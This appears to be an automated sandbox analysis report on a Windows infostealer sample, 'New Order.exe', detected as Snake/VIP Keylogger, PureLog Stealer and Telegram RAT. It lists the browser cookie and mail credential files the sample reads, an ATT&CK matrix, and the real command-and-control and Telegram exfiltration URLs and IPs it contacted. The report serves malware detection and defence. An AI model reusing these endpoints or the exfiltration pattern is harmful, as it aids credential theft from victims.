Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: New Order.exe	Binary or memory string: WIN_81
Source: New Order.exe	Binary or memory string: WIN_XP
Source: New Order.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: New Order.exe	Binary or memory string: WIN_XPe
Source: New Order.exe	Binary or memory string: WIN_VISTA
Source: New Order.exe	Binary or memory string: WIN_7
Source: New Order.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00341204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00341204
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00341806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00341806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	211 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 Inhibit System Recovery
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New Order.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enp	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
http://mail.lenteraandalan.com	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	malware
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://www.office.com/p	0%	Avira URL Cloud	safe
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	malware
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
http://lenteraandalan.com	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2026/07/2024%20/%2001:41:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
lenteraandalan.com	103.163.138.29	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown
mail.lenteraandalan.com	unknown	unknown	true	unknown
56.126.166.20.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2026/07/2024%20/%2001:41:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000002.00000002.3710743916.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.lenteraandalan.com	RegSvcs.exe, 00000002.00000002.3710743916.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	RegSvcs.exe, 00000002.00000002.3710743916.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enp	RegSvcs.exe, 00000002.00000002.3710743916.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a	RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000002.00000002.3710743916.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	RegSvcs.exe, 00000002.00000002.3710743916.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://lenteraandalan.com	RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/p	RegSvcs.exe, 00000002.00000002.3710743916.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	RegSvcs.exe, 00000002.00000002.3710743916.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.3710743916.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
103.163.138.29	lenteraandalan.com	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482087
Start date and time:	2024-07-25 18:06:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New Order.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 48 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: New Order.exe

Simulations

Behavior and APIs

Time	Type	Description
12:07:46	API Interceptor	12018140x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Install.msi	Get hash	malicious	Unknown	Browse
103.163.138.29	https://ncv.microsoft.com/41tjSO5Dvt	Get hash	malicious	HTMLPhisher	Browse
	https://aqarasm-opesk.box.com/s/8trtasomjw0xvlkclp7uffugx9ozm57m	Get hash	malicious	HTMLPhisher	Browse
	https://astradshippingza-my.sharepoint.com/:o:/g/personal/okecia_naicker_astradshipping_com/Et0IRtc56CdKsSYWFGMj4qkB8e3YibwN79Jzq3SZXj1O5g?e=5%3a2hi92r&at=9	Get hash	malicious	HTMLPhisher	Browse
	Copy of Est_37289!.xlsx	Get hash	malicious	HTMLPhisher	Browse
	https://www.pdfcontent.com/	Get hash	malicious	HTMLPhisher	Browse
